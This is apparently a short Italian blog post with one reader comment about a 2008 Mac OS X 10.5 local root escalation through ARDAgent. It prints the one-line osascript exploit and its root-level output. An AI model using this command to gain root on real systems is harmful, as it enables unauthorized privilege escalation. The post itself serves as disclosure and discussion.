Root escalation, osx 10.5. Peggio di windows?
Non mi esprimo e copio incollo semplicemente quello che è il bug..
mymac$ osascript -e ‘tell app “ARDAgent” to do shell script “id”‘;
uid=0(root)gid=0(wheel)egid=20(staff)groups=0(wheel),1(daemon),
2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),
5(operator),80(admin),20(staff)
fonte: http://it.slashdot.org/article.pl?sid=08/06/18/1919224&from=rss
Ciao!
Scusa l’ignoranza del problema, ma dal link che citi in fonte, pare serva l’accesso fisico alla macchina. OK, la vulnerabilità c’è, ma il fatto che non esista da remoto mi pare una grossa attenuante. Scusa lo sfogo da “mac-user”.
BTW, sono arrivato a questo blog tramite LinkedIn :-)
Roberto
30 Sep 08 at 11:58 AM